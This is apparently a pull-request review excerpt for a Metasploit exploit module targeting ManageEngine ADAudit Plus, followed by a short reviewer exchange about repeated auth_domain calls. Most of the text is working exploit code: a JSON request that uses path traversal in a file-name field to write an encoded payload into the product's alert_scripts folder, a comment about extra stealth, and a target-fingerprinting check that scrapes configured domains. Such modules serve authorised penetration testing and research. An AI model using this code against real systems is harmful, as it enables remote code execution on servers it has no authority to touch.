modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb

```diff
@@ -0,0 +1,726 @@
+      'GPO_GUID' => "{#{Rex::Text.rand_text_alphanumeric(8)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(12)}}".downcase,
+      'GPO_VERSION' => rand(1..9),
+      # use the same VER_FILE_NAME format as ADAudit Plus for a dash of extra stealth
+      'VER_FILE_NAME' => "#{rand(1..9)}_#{Rex::Text.rand_text_numeric(18)}".downcase + '.xml',
+      'xmlReport' => '<?xml version="1.0" encoding="utf-16"?>',
+      'Html_fileName' => "..\\..\\..\\..\\..\\alert_scripts\\#{ps1_script_name}", # the traversal path to alert_scripts should always be correct no matter where ADAudit Plus is installed
+      'htmlReport' => payload.encoded
+    }.to_json
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'agent', 'tabs', 'agentGPOWatcherData'),
+      'ctype' => 'application/json',
+      'data' => json_post_data
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed')
+    end
+
+    unless res.code == 200 && res.body.include?('{"success":true}')
+      fail_with(Failure::Unknown, 'Failed to upload the payload.')
+    end
+
+    print_good("Successfully wrote the payload to /alert_scripts/#{ps1_script_name} in the ManageEngine ADAudit Plus install directory")
+    ps1_script_name
+  end
+
+  def check
+    # visit the default page to check if the target is ADAudit Plus
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    })
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    unless res.code == 200 && res.body =~ /<title>ADAudit Plus/
+      return CheckCode::Safe('Does not appear to be ADAudit Plus')
+    end
+
+    # in order to trigger the final payload in the exploit method, we will need to send an authentication request to ADAudit Plus with incorrect active directory credentials
+    # if the user didn't provide an active directory domain, we can try to extract the FQDN for a configured domain from the server response
+    domain_aliases = res.body.scan(/<select id="domainName" name="domainName".*?<option value="(.*?)">/m)&.flatten
+
+    if domain_aliases.blank?
+      return CheckCode::Safe("No configured active directory domains were found. The target may or may not be vulnerable but the module won't be able to trigger the payload.")
+    end
+
+    if auth_domain == 'ADAuditPlus Authentication'
+      @domain_alias = domain_aliases.first
+    else
+      unless domain_aliases.include?(auth_domain)
+        print_status('Identified the following configured authentication domain(s):')
+        domain_aliases.each do |dom|
+          print_line("- #{dom}")
+        end
+        return CheckCode::Detected("The provided AUTH_DOMAIN #{auth_domain} does not match the configured authentication domain(s).")
+      end
+
+      @domain_alias = auth_domain
```

Comment:
Your calling auth_domain up to three times here. Would it not be better to save the results and then use that for comparison?

Reply:
I guess my point here was that you could save this to a local variable vs making multiple method calls for the same data. However that being said I mistakenly thought this function was more complex than it is so the overhead here would mainly be r.e setting up and tearing down call stacks several times to retrieve the same data.

Up to you though this was more of a performance suggestion and isn't a huge issue.